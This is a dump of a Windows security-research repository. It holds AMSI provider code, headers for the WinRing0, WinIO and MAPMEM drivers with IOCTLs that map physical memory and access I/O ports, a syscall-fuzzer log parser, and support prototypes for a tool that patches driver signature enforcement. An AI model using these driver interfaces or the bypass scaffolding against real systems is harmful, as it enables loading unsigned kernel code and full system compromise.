71 | }
72 |
73 |
74 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiProvider.h:
--------------------------------------------------------------------------------
1 | // AmsiProvider.h : Declaration of the CAmsiProvider
2 |
3 | #pragma once
4 | #include "resource.h" // main symbols
5 |
6 |
7 |
8 | #include "AmsiScan_i.h"
9 | #include
10 |
11 |
12 | #if defined(_WIN32_WCE) && !defined(_CE_DCOM) && !defined(_CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA)
13 | #error "Single-threaded COM objects are not properly supported on Windows CE platform, such as the Windows Mobile platforms that do not include full DCOM support. Define _CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA to force ATL to support creating single-thread COM object's and allow use of it's single-threaded COM object implementations. The threading model in your rgs file was set to 'Free' as that is the only threading model supported in non DCOM Windows CE platforms."
14 | #endif
15 |
16 | using namespace ATL;
17 |
18 |
19 | // CAmsiProvider
20 |
21 | class ATL_NO_VTABLE CAmsiProvider :
22 | public CComObjectRootEx,
23 | public CComCoClass,
24 | public IAntimalwareProvider
25 | {
26 | public:
27 | CAmsiProvider()
28 | {
29 | }
30 |
31 | DECLARE_REGISTRY_RESOURCEID(IDR_AMSIPROVIDER)
32 |
33 |
34 | BEGIN_COM_MAP(CAmsiProvider)
35 | COM_INTERFACE_ENTRY(IAntimalwareProvider)
36 | END_COM_MAP()
37 |
38 |
39 |
40 | DECLARE_PROTECT_FINAL_CONSTRUCT()
41 |
42 | HRESULT FinalConstruct()
43 | {
44 | return S_OK;
45 | }
46 |
47 | void FinalRelease()
48 | {
49 | }
50 |
51 | public:
52 |
53 | HRESULT STDMETHODCALLTYPE Scan(
54 | _In_ IAmsiStream *stream,
55 | _Out_ AMSI_RESULT *result);
56 |
57 | void STDMETHODCALLTYPE CloseSession(
58 | _In_ ULONGLONG session);
59 |
60 | HRESULT STDMETHODCALLTYPE DisplayName(
61 | _Outptr_ LPWSTR *displayName);
62 |
63 | };
64 |
65 | OBJECT_ENTRY_AUTO(__uuidof(AmsiProvider), CAmsiProvider)
66 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/OlsDll.h:
--------------------------------------------------------------------------------
1 | //-----------------------------------------------------------------------------
2 | // Author : hiyohiyo
3 | // Mail : hiyohiyo@crystalmark.info
4 | // Web : http://openlibsys.org/
5 | // License : The modified BSD license
6 | //
7 | // Copyright 2007-2009 OpenLibSys.org. All rights reserved.
8 | //-----------------------------------------------------------------------------
9 |
10 | #pragma once
11 |
12 | //-----------------------------------------------------------------------------
13 | //
14 | // Version Information
15 | //
16 | //-----------------------------------------------------------------------------
17 |
18 | #define OLS_MAJOR_VERSION 1
19 | #define OLS_MINOR_VERSION 3
20 | #define OLS_REVISION 0
21 | #define OLS_RELESE 18
22 |
23 | #define OLS_VERSION ((OLS_MAJOR_VERSION << 24) | (OLS_MINOR_VERSION << 16) |\
24 | (OLS_REVISION << 8) | OLS_RELESE)
25 |
26 | //-----------------------------------------------------------------------------
27 | //
28 | // Defines
29 | //
30 | //-----------------------------------------------------------------------------
31 |
32 | #define OLS_DRIVER_FILE_NAME_WIN_9X _T("WinRing0.vxd")
33 | #define OLS_DRIVER_FILE_NAME_WIN_NT _T("WinRing0.sys")
34 | #define OLS_DRIVER_FILE_NAME_WIN_NT_X64 _T("WinRing0x64.sys")
35 | #define OLS_DRIVER_FILE_NAME_WIN_NT_IA64 _T("WinRing0ia64.sys") // Reserved
36 |
37 | //-----------------------------------------------------------------------------
38 | //
39 | // Prototypes
40 | //
41 | //-----------------------------------------------------------------------------
42 |
43 | DWORD Initialize();
44 | void Deinitialize();
45 | DWORD InitDriverInfo();
46 |
47 | BOOL OpenDriver();
48 | BOOL LoadDriver(TCHAR *DriverFileName, TCHAR *DriverId);
49 | BOOL UnloadDriver(TCHAR *DriverId);
50 | DWORD GetRefCount();
51 |
52 | BOOL IsNT();
53 | BOOL IsWow64();
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/srvany2.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {193b68bc-13ea-43ca-9f81-6a739b38bb42}
18 |
19 |
20 |
21 |
22 | Source Files
23 |
24 |
25 | minirtl
26 |
27 |
28 | minirtl
29 |
30 |
31 | minirtl
32 |
33 |
34 | minirtl
35 |
36 |
37 |
38 |
39 | Header Files
40 |
41 |
42 | Header Files
43 |
44 |
45 | minirtl
46 |
47 |
48 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Drv/winio_nt.h:
--------------------------------------------------------------------------------
1 | #ifndef WINIONT_H
2 | #define WINIONT_H
3 |
4 | // Define the various device type values. Note that values used by Microsoft
5 | // Corporation are in the range 0-32767, and 32768-65535 are reserved for use
6 | // by customers.
7 |
8 | #define FILE_DEVICE_WINIO 0x00008010
9 |
10 | // Macro definition for defining IOCTL and FSCTL function control codes.
11 | // Note that function codes 0-2047 are reserved for Microsoft Corporation,
12 | // and 2048-4095 are reserved for customers.
13 |
14 | #define WINIO_IOCTL_INDEX 0x810
15 |
16 | // Define our own private IOCTL
17 |
18 | #define IOCTL_WINIO_MAPPHYSTOLIN CTL_CODE(FILE_DEVICE_WINIO, \
19 | WINIO_IOCTL_INDEX, \
20 | METHOD_BUFFERED, \
21 | FILE_ANY_ACCESS)
22 |
23 | #define IOCTL_WINIO_UNMAPPHYSADDR CTL_CODE(FILE_DEVICE_WINIO, \
24 | WINIO_IOCTL_INDEX + 1, \
25 | METHOD_BUFFERED, \
26 | FILE_ANY_ACCESS)
27 |
28 | #define IOCTL_WINIO_ENABLEDIRECTIO CTL_CODE(FILE_DEVICE_WINIO, \
29 | WINIO_IOCTL_INDEX + 2, \
30 | METHOD_BUFFERED, \
31 | FILE_ANY_ACCESS)
32 |
33 | #define IOCTL_WINIO_DISABLEDIRECTIO CTL_CODE(FILE_DEVICE_WINIO, \
34 | WINIO_IOCTL_INDEX + 3, \
35 | METHOD_BUFFERED, \
36 | FILE_ANY_ACCESS)
37 |
38 | #define IOCTL_WINIO_READPORT CTL_CODE(FILE_DEVICE_WINIO, \
39 | WINIO_IOCTL_INDEX + 4, \
40 | METHOD_BUFFERED, \
41 | FILE_ANY_ACCESS)
42 |
43 | #define IOCTL_WINIO_WRITEPORT CTL_CODE(FILE_DEVICE_WINIO, \
44 | WINIO_IOCTL_INDEX + 5, \
45 | METHOD_BUFFERED, \
46 | FILE_ANY_ACCESS)
47 |
48 | #pragma pack(push)
49 | #pragma pack(1)
50 |
51 | struct tagPhysStruct
52 | {
53 | DWORD64 dwPhysMemSizeInBytes;
54 | DWORD64 pvPhysAddress;
55 | DWORD64 PhysicalMemoryHandle;
56 | DWORD64 pvPhysMemLin;
57 | DWORD64 pvPhysSection;
58 | };
59 |
60 | struct tagPortStruct
61 | {
62 | USHORT wPortAddr;
63 | ULONG dwPortVal;
64 | UCHAR bSize;
65 | };
66 |
67 | #pragma pack(pop)
68 |
69 | #endif
70 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/SYS/MAPMEM.H:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | Copyright (c) 1993 Microsoft Corporation
4 |
5 | Module Name:
6 |
7 | mapmem.h
8 |
9 | Abstract:
10 |
11 |
12 | Environment:
13 |
14 | kernel & User mode
15 |
16 | Notes:
17 |
18 |
19 | Revision History:
20 |
21 | --*/
22 |
23 |
24 | //
25 | // Define the various device type values. Note that values used by Microsoft
26 | // Corporation are in the range 0-32767, and 32768-65535 are reserved for use
27 | // by customers.
28 | //
29 |
30 | #define FILE_DEVICE_MAPMEM 0x00008000
31 |
32 |
33 |
34 | //
35 | // Macro definition for defining IOCTL and FSCTL function control codes. Note
36 | // that function codes 0-2047 are reserved for Microsoft Corporation, and
37 | // 2048-4095 are reserved for customers.
38 | //
39 |
40 | #define MAPMEM_IOCTL_INDEX 0x800
41 |
42 |
43 | //
44 | // Define our own private IOCTL
45 | //
46 |
47 | #define IOCTL_MAPMEM_MAP_USER_PHYSICAL_MEMORY CTL_CODE(FILE_DEVICE_MAPMEM , \
48 | MAPMEM_IOCTL_INDEX, \
49 | METHOD_BUFFERED, \
50 | FILE_ANY_ACCESS)
51 |
52 | #define IOCTL_MAPMEM_UNMAP_USER_PHYSICAL_MEMORY CTL_CODE(FILE_DEVICE_MAPMEM, \
53 | MAPMEM_IOCTL_INDEX+1,\
54 | METHOD_BUFFERED, \
55 | FILE_ANY_ACCESS)
56 |
57 |
58 |
59 |
60 | //
61 | // Our user mode app will pass an initialized structure like this
62 | // down to the kernel mode driver
63 | //
64 |
65 | typedef struct
66 | {
67 | INTERFACE_TYPE InterfaceType; // Isa, Eisa, etc....
68 | ULONG BusNumber; // Bus number
69 | PHYSICAL_ADDRESS BusAddress; // Bus-relative address
70 | ULONG AddressSpace; // 0 is memory, 1 is I/O
71 | ULONG Length; // Length of section to map
72 |
73 | } PHYSICAL_MEMORY_INFO, *PPHYSICAL_MEMORY_INFO;
74 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/w32parguments.h:
--------------------------------------------------------------------------------
1 | /* MACHINE GENERATED, DO NOT EDIT */
2 | UCHAR W32pServiceArgumentTable[] = {
3 | 1, 1, 6, 4, 5, 2, 3, 12, 6, 0, 1, 10, 1, 11, 1, 8, 1, 2, 2, 6, 4, 3, 1, 4, 2, 5, 1, 1, 8, 3, 1, 6, 11, 9, 4, 1, 3, 1, 2, 3, 4, 4, 6, 6, 2, 4, 1, 1, 1, 7, 1,
4 | 3, 3, 2, 2, 3, 2, 2, 2, 1, 8, 8, 2, 6, 1, 1, 2, 2, 1, 2, 5, 2, 2, 2, 2, 2, 3, 2, 2, 2, 2, 2, 2, 3, 2, 11, 2, 2, 1, 2, 2, 2, 2, 3, 3, 3, 2, 2, 2, 3, 2,
5 | 2, 2, 2, 2, 4, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 3, 2, 6, 1, 1, 2, 1, 4, 2, 4, 6, 4, 5, 1, 1, 1, 1, 5, 1, 7, 4, 2, 7, 5, 11, 3, 8, 5, 3, 3, 9, 1, 3, 1, 0,
6 | 2, 5, 5, 4, 2, 3, 2, 3, 6, 6, 1, 6, 2, 2, 1, 3, 1, 2, 3, 2, 2, 2, 9, 2, 3, 5, 7, 5, 6, 8, 3, 3, 2, 3, 2, 2, 2, 4, 4, 3, 3, 2, 3, 3, 2, 7, 4, 5, 1, 5,
7 | 1, 3, 5, 8, 4, 3, 3, 6, 7, 10, 0, 2, 2, 2, 7, 6, 5, 8, 0, 0, 5, 2, 3, 5, 2, 13, 3, 1, 4, 3, 3, 7, 6, 5, 1, 11, 4, 5, 4, 3, 3, 3, 1, 5, 2, 2, 6, 1, 5, 2,
8 | 2, 7, 1, 6, 6, 2, 2, 2, 2, 2, 2, 3, 4, 3, 2, 4, 2, 2, 2, 16, 1, 3, 3, 3, 3, 1, 3, 1, 1, 3, 4, 2, 5, 2, 3, 3, 5, 3, 4, 1, 12, 16, 1, 1, 1, 5, 11, 2, 1, 1,
9 | 1, 1, 2, 3, 3, 3, 2, 8, 1, 4, 7, 4, 4, 2, 2, 2, 3, 3, 2, 4, 1, 2, 3, 2, 4, 2, 3, 4, 1, 0, 1, 1, 3, 2, 3, 0, 2, 4, 5, 1, 4, 15, 7, 3, 5, 3, 8, 2, 3, 1,
10 | 2, 1, 1, 1, 1, 1, 3, 5, 4, 4, 7, 11, 5, 0, 3, 3, 2, 0, 2, 4, 5, 4, 1, 2, 4, 3, 5, 1, 6, 2, 1, 1, 2, 0, 1, 5, 3, 2, 3, 0, 0, 0, 1, 2, 3, 4, 3, 4, 1, 1,
11 | 3, 0, 0, 2, 2, 6, 4, 4, 2, 3, 2, 1, 1, 3, 1, 1, 4, 2, 4, 4, 5, 5, 0, 2, 0, 3, 5, 4, 3, 3, 3, 2, 2, 1, 2, 3, 3, 1, 2, 2, 3, 1, 4, 2, 3, 4, 12, 3, 3, 3,
12 | 1, 2, 7, 1, 1, 0, 4, 4, 7, 3, 0, 2, 2, 6, 3, 4, 4, 2, 3, 3, 2, 1, 5, 4, 4, 3, 3, 4, 2, 1, 2, 3, 6, 2, 4, 7, 4, 4, 3, 1, 1, 3, 2, 4, 1, 4, 7, 8, 3, 3,
13 | 1, 2, 1, 4, 3, 3, 1, 2, 1, 2, 4, 1, 5, 1, 2, 4, 4, 4, 1, 1, 3, 2, 3, 1, 4, 2, 1, 3, 4, 2, 4, 2, 2, 4, 1, 2, 2, 4, 2, 4, 2, 7, 3, 3, 6, 4, 3, 8, 1, 3,
14 | 2, 2, 0, 1, 4, 1, 2, 6, 7, 1, 6, 5, 6, 3, 2, 1, 1, 1, 1, 3, 0, 2, 3, 3, 10, 4, 4, 2, 3, 1, 2, 1, 3, 3, 1, 0, 6, 2, 0, 3, 4, 0, 0, 3, 3, 6, 4, 4, 6, 3,
15 | 6, 1, 1, 3, 1, 1, 11, 11, 11, 1, 8, 7, 10, 5, 9, 7, 10, 8, 10, 13, 4, 2, 1, 3, 5, 1, 1, 0, 1, 1, 2, 1, 1, 5, 2, 3, 1, 5, 1, 1, 2, 2, 2, 3, 3, 4, 1, 1, 2, 2,
16 | 1, 4, 3, 1, 1, 4, 6, 1, 4, 2, 1, 3, 2, 1, 4, 4, 4, 4, 4, 2, 3, 2, 2, 3, 1, 1 };
17 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/w32parguments_checked.h:
--------------------------------------------------------------------------------
1 | /* MACHINE GENERATED, DO NOT EDIT */
2 | UCHAR W32pServiceArgumentTable[] = {
3 | 1, 1, 6, 4, 5, 2, 3, 12, 6, 0, 1, 10, 1, 11, 1, 8, 1, 2, 2, 6, 4, 3, 1, 4, 2, 5, 1, 1, 8, 3, 1, 6, 11, 9, 4, 1, 3, 1, 2, 3, 4, 4, 6, 6, 2, 4, 1, 1, 1, 7, 1,
4 | 3, 3, 2, 2, 3, 2, 2, 2, 1, 8, 8, 2, 6, 1, 1, 2, 2, 1, 2, 5, 2, 2, 2, 2, 2, 3, 2, 2, 2, 2, 2, 2, 3, 2, 11, 2, 2, 1, 2, 2, 2, 2, 3, 3, 3, 2, 2, 2, 3, 2,
5 | 2, 2, 2, 2, 4, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 3, 2, 6, 1, 1, 2, 1, 4, 2, 4, 6, 4, 5, 1, 1, 1, 1, 5, 1, 7, 4, 2, 7, 5, 11, 3, 8, 5, 3, 3, 9, 1, 3, 1, 0,
6 | 2, 5, 5, 4, 2, 3, 2, 3, 6, 6, 1, 6, 2, 2, 1, 3, 1, 2, 3, 2, 2, 2, 9, 2, 3, 5, 7, 5, 6, 8, 3, 3, 2, 3, 2, 2, 2, 4, 4, 3, 3, 2, 3, 3, 2, 7, 4, 5, 1, 5,
7 | 1, 3, 5, 8, 4, 3, 3, 6, 7, 10, 0, 2, 2, 2, 7, 6, 5, 8, 0, 0, 5, 2, 3, 5, 2, 13, 3, 1, 4, 3, 3, 7, 6, 5, 1, 11, 4, 5, 4, 3, 3, 3, 1, 5, 2, 2, 6, 1, 5, 2,
8 | 2, 7, 1, 6, 6, 2, 2, 2, 2, 2, 2, 3, 4, 3, 2, 4, 2, 2, 2, 16, 1, 3, 3, 3, 3, 1, 3, 1, 1, 3, 4, 2, 5, 2, 3, 3, 5, 3, 4, 1, 12, 16, 1, 1, 1, 5, 11, 2, 1, 1,
9 | 1, 1, 2, 3, 3, 3, 2, 8, 1, 4, 7, 4, 4, 2, 2, 2, 3, 3, 2, 4, 1, 2, 3, 2, 4, 2, 3, 4, 1, 0, 1, 1, 3, 2, 3, 0, 2, 4, 5, 1, 4, 15, 7, 3, 5, 3, 8, 2, 3, 1,
10 | 2, 1, 1, 1, 1, 1, 3, 5, 4, 4, 7, 11, 5, 0, 3, 3, 2, 0, 2, 4, 5, 4, 1, 2, 4, 3, 5, 1, 6, 2, 1, 1, 2, 0, 1, 5, 3, 2, 3, 0, 0, 0, 1, 2, 3, 4, 3, 4, 1, 1,
11 | 3, 0, 0, 2, 2, 6, 4, 4, 2, 3, 2, 1, 1, 3, 1, 1, 4, 2, 4, 4, 5, 5, 0, 2, 0, 3, 5, 4, 3, 3, 3, 2, 2, 1, 2, 3, 3, 1, 2, 2, 3, 1, 4, 2, 3, 4, 12, 3, 3, 3,
12 | 1, 2, 7, 1, 1, 0, 4, 4, 7, 3, 0, 2, 2, 6, 3, 4, 4, 2, 3, 3, 2, 1, 5, 4, 4, 3, 3, 4, 2, 1, 2, 3, 6, 2, 4, 7, 4, 4, 3, 1, 1, 3, 2, 4, 1, 4, 7, 8, 3, 3,
13 | 1, 2, 1, 4, 3, 3, 1, 2, 1, 2, 4, 1, 5, 1, 2, 4, 4, 4, 1, 1, 3, 2, 3, 1, 4, 2, 1, 3, 4, 2, 4, 2, 2, 4, 1, 2, 2, 4, 2, 4, 2, 7, 3, 3, 6, 4, 3, 8, 1, 3,
14 | 2, 2, 0, 1, 4, 1, 2, 6, 7, 1, 6, 5, 6, 3, 2, 1, 1, 1, 1, 3, 0, 2, 3, 3, 10, 4, 4, 2, 3, 1, 2, 1, 3, 3, 1, 0, 6, 2, 0, 3, 4, 0, 0, 3, 3, 6, 4, 4, 6, 3,
15 | 6, 1, 1, 3, 1, 1, 11, 11, 11, 1, 8, 7, 10, 5, 9, 7, 10, 8, 10, 13, 4, 2, 1, 3, 5, 1, 1, 0, 1, 1, 2, 1, 1, 5, 2, 3, 1, 5, 1, 1, 2, 2, 2, 3, 3, 4, 1, 1, 2, 2,
16 | 1, 4, 3, 1, 1, 4, 6, 1, 4, 2, 1, 3, 2, 2, 2, 1, 1, 2, 1, 4, 4, 4, 4, 4, 2, 3, 2, 2, 3, 1, 1 };
17 |
--------------------------------------------------------------------------------
/source/StripDebug/StripDebug.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {a2258c3e-0c10-4091-bb15-4cfbc255d0c5}
18 |
19 |
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 | minirtl
29 |
30 |
31 | minirtl
32 |
33 |
34 | minirtl
35 |
36 |
37 | minirtl
38 |
39 |
40 |
41 |
42 | Header Files
43 |
44 |
45 | Header Files
46 |
47 |
48 | Header Files
49 |
50 |
51 | minirtl
52 |
53 |
54 | Header Files
55 |
56 |
57 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan_i.c:
--------------------------------------------------------------------------------
1 |
2 |
3 | /* this ALWAYS GENERATED file contains the IIDs and CLSIDs */
4 |
5 | /* link this file in with the server and any clients */
6 |
7 |
8 | /* File created by MIDL compiler version 8.01.0622 */
9 | /* at Mon Jan 18 19:14:07 2038
10 | */
11 | /* Compiler settings for AmsiScan.idl:
12 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
13 | protocol : all , ms_ext, c_ext, robust
14 | error checks: allocation ref bounds_check enum stub_data
15 | VC __declspec() decoration level:
16 | __declspec(uuid()), __declspec(selectany), __declspec(novtable)
17 | DECLSPEC_UUID(), MIDL_INTERFACE()
18 | */
19 | /* @@MIDL_FILE_HEADING( ) */
20 |
21 |
22 |
23 | #ifdef __cplusplus
24 | extern "C"{
25 | #endif
26 |
27 |
28 | #include
29 | #include
30 |
31 | #ifdef _MIDL_USE_GUIDDEF_
32 |
33 | #ifndef INITGUID
34 | #define INITGUID
35 | #include
36 | #undef INITGUID
37 | #else
38 | #include
39 | #endif
40 |
41 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \
42 | DEFINE_GUID(name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8)
43 |
44 | #else // !_MIDL_USE_GUIDDEF_
45 |
46 | #ifndef __IID_DEFINED__
47 | #define __IID_DEFINED__
48 |
49 | typedef struct _IID
50 | {
51 | unsigned long x;
52 | unsigned short s1;
53 | unsigned short s2;
54 | unsigned char c[8];
55 | } IID;
56 |
57 | #endif // __IID_DEFINED__
58 |
59 | #ifndef CLSID_DEFINED
60 | #define CLSID_DEFINED
61 | typedef IID CLSID;
62 | #endif // CLSID_DEFINED
63 |
64 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \
65 | EXTERN_C __declspec(selectany) const type name = {l,w1,w2,{b1,b2,b3,b4,b5,b6,b7,b8}}
66 |
67 | #endif // !_MIDL_USE_GUIDDEF_
68 |
69 | MIDL_DEFINE_GUID(IID, IID_IAmsiProvider,0x05025dfe,0x70d5,0x4b61,0xa5,0x5a,0xaa,0x21,0x58,0x5d,0x4c,0xb2);
70 |
71 |
72 | MIDL_DEFINE_GUID(IID, LIBID_AmsiScanLib,0x508c88ef,0xca97,0x4107,0xa0,0x22,0x60,0x25,0x89,0x2e,0xf1,0x92);
73 |
74 |
75 | MIDL_DEFINE_GUID(CLSID, CLSID_AmsiProvider,0x1c0643e1,0x5b0a,0x4420,0x9b,0x76,0x0d,0xe9,0x26,0x4b,0x4c,0x59);
76 |
77 | #undef MIDL_DEFINE_GUID
78 |
79 | #ifdef __cplusplus
80 | }
81 | #endif
82 |
83 |
84 |
85 |
--------------------------------------------------------------------------------
/source/NtCall64_LogParser/NtCall64_LogParser.cpp:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * NTCALL64 Log File Parser
4 | *
5 | * Parses log files generated by NTCALL64 -log switch (binary format).
6 | *
7 | *******************************************************************************/
8 |
9 | #define _CRT_SECURE_NO_WARNINGS
10 | #include
11 | #include
12 | #include
13 |
14 | #define NC64_LOG_MAX_ARGS 16
15 |
16 | #pragma pack(push, 1)
17 | typedef struct _NC64_SYSCALL_LOG_ENTRY {
18 | ULONG SyscallNumber;
19 | ULONG ArgCount;
20 | ULONG_PTR Arguments[NC64_LOG_MAX_ARGS];
21 | } NC64_SYSCALL_LOG_ENTRY, * PNC64_SYSCALL_LOG_ENTRY;
22 | #pragma pack(pop)
23 |
24 | void print_entry(const NC64_SYSCALL_LOG_ENTRY* entry, size_t index) {
25 | printf("Entry %zu:\n", index);
26 | printf(" SyscallNumber: %lu (0x%lX)\n", entry->SyscallNumber, entry->SyscallNumber);
27 | printf(" Argument Count: %lu\n", entry->ArgCount);
28 | for (ULONG i = 0; i < entry->ArgCount && i < NC64_LOG_MAX_ARGS; ++i) {
29 | #ifdef _WIN64
30 | printf(" Arg[%02lu]: 0x%016llX\n", i, (unsigned long long)entry->Arguments[i]);
31 | #else
32 | printf(" Arg[%02lu]: 0x%08lX\n", i, (unsigned long)entry->Arguments[i]);
33 | #endif
34 | }
35 | printf("\n");
36 | }
37 |
38 | int main(int argc, char* argv[])
39 | {
40 | if (argc != 2) {
41 | printf("Usage: %s \n", argv[0]);
42 | return 1;
43 | }
44 |
45 | const char* filename = argv[1];
46 | FILE* f = NULL;
47 | errno_t err = fopen_s(&f, filename, "rb");
48 | if (err != 0 || f == NULL) {
49 | fprintf(stderr, "Error opening log file: %s\n", filename);
50 | return 1;
51 | }
52 |
53 | NC64_SYSCALL_LOG_ENTRY entry;
54 | size_t entry_size = sizeof(NC64_SYSCALL_LOG_ENTRY);
55 | size_t index = 0;
56 |
57 | while (fread(&entry, 1, entry_size, f) == entry_size) {
58 | print_entry(&entry, index);
59 | ++index;
60 | }
61 |
62 | if (!feof(f)) {
63 | fprintf(stderr, "Warning: incomplete or corrupt log file detected at entry %zu.\n", index);
64 | }
65 |
66 | fclose(f);
67 | printf("Done. %zu entries read.\n", index);
68 | return 0;
69 | }
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/sup.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019
4 | *
5 | * TITLE: SUP.H
6 | *
7 | * VERSION: 1.00
8 | *
9 | * DATE: 23 Jan 2019
10 | *
11 | * Common header file for the program support routines.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
22 |
23 | typedef struct _OBJSCANPARAM {
24 | PWSTR Buffer;
25 | ULONG BufferSize;
26 | } OBJSCANPARAM, *POBJSCANPARAM;
27 |
28 | void supCopyMemory(
29 | _Inout_ void *dest,
30 | _In_ size_t ccdest,
31 | _In_ const void *src,
32 | _In_ size_t ccsrc);
33 |
34 | PVOID supGetSystemInfo(
35 | _In_ SYSTEM_INFORMATION_CLASS InfoClass);
36 |
37 | BOOL supBackupVBoxDrv(
38 | _In_ BOOL bRestore);
39 |
40 | DWORD supWriteBufferToFile(
41 | _In_ LPWSTR lpFileName,
42 | _In_ PVOID Buffer,
43 | _In_ DWORD BufferSize);
44 |
45 | BOOL supIsObjectExists(
46 | _In_ LPWSTR RootDirectory,
47 | _In_ LPWSTR ObjectName);
48 |
49 | ULONG_PTR supGetModuleBaseByName(
50 | _In_ LPSTR ModuleName);
51 |
52 | ULONG_PTR supGetNtOsBase(
53 | VOID);
54 |
55 | BOOL supIsVBoxInstalled(
56 | VOID);
57 |
58 | PVOID supLookupImageSectionByName(
59 | _In_ CHAR* SectionName,
60 | _In_ ULONG SectionNameLength,
61 | _In_ PVOID DllBase,
62 | _Out_ PULONG SectionSize);
63 |
64 | ULONG_PTR supFindCiCallbacks(
65 | _In_ ULONG NtBuildNumber,
66 | _In_ ULONG NtOsSize,
67 | _In_ ULONG_PTR NtOsBase,
68 | _In_ HMODULE hNtOs);
69 |
70 | PVOID supFindPattern(
71 | _In_ CONST PBYTE Buffer,
72 | _In_ SIZE_T BufferSize,
73 | _In_ CONST PBYTE Pattern,
74 | _In_ SIZE_T PatternSize);
75 |
76 | ULONG supSizeOfProc(
77 | _In_ PBYTE FunctionPtr);
78 |
79 | ULONG_PTR supGetProcAddress(
80 | _In_ ULONG_PTR KernelBase,
81 | _In_ ULONG_PTR KernelImage,
82 | _In_ LPCSTR FunctionName);
83 |
84 | #define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)
85 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/AmsiProviderServer.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {5baab34b-228c-4014-a376-ce5e8f112526}
18 |
19 |
20 |
21 |
22 | Source Files
23 |
24 |
25 | minirtl
26 |
27 |
28 | Source Files
29 |
30 |
31 | minirtl
32 |
33 |
34 | minirtl
35 |
36 |
37 | minirtl
38 |
39 |
40 | minirtl
41 |
42 |
43 | minirtl
44 |
45 |
46 |
47 |
48 | Source Files
49 |
50 |
51 |
52 |
53 | Header Files
54 |
55 |
56 | Header Files
57 |
58 |
59 | Header Files
60 |
61 |
62 | Header Files
63 |
64 |
65 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/OlsDef.h:
--------------------------------------------------------------------------------
1 | //-----------------------------------------------------------------------------
2 | // Author : hiyohiyo
3 | // Mail : hiyohiyo@crystalmark.info
4 | // Web : http://openlibsys.org/
5 | // License : The modified BSD license
6 | //
7 | // Copyright 2007 OpenLibSys.org. All rights reserved.
8 | //-----------------------------------------------------------------------------
9 |
10 | #pragma once
11 |
12 | //-----------------------------------------------------------------------------
13 | //
14 | // DLL Status Code
15 | //
16 | //-----------------------------------------------------------------------------
17 |
18 | #define OLS_DLL_NO_ERROR 0
19 | #define OLS_DLL_UNSUPPORTED_PLATFORM 1
20 | #define OLS_DLL_DRIVER_NOT_LOADED 2
21 | #define OLS_DLL_DRIVER_NOT_FOUND 3
22 | #define OLS_DLL_DRIVER_UNLOADED 4
